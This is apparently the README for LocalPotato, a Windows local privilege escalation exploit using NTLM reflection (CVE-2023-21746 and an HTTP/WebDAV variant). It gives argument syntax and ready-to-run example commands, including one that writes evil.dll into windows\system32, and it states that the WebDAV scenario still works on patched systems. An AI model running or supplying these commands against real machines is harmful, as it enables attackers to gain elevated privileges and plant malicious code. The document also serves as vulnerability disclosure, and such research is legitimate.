Awesome
LocalPotato
Another Local Windows privilege escalation using a new potato technique ;)
The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.
NOTE: The SMB scenario has been fixed by Microsoft in the January 2023 Patch Tuesday with the CVE-2023-21746. If you run this exploit against a patched machine it won't work.
More technical details at --> https://www.localpotato.com/localpotato_html/LocalPotato.html
NOTE2: The HTTP/WebDAV scenario is currently unpatched (Microsoft decision, we reported it) and works on updated systems.
More technical details at --> https://decoder.cloud/2023/11/03/localpotato-http-edition/
Usage
LocalPotato (aka CVE-2023-21746 & HTTP/WebDAV)
by splinter_code & decoder_it
Mandatory Args:
SMB:
-i Source file to copy for SMB
-o Output file for SMB - do not specify the drive letter
HTTP:
-r host/ip for HTTP
-u target URL for HTTP
Optional Args:
-c CLSID (Default {854A20FB-2D44-457D-992F-EF13785D2B51})
-p COM server port (Default 10271)
Examples:
- SMB:
LocalPotato.exe -i c:\hacker\evil.dll -o windows\system32\evil.dll
- HTTP/WebDAV:
LocalPotato.exe -r 127.0.0.1 -u /webdavshare/potato.local
Demo
-
SMB:
-
HTTP/WebDAV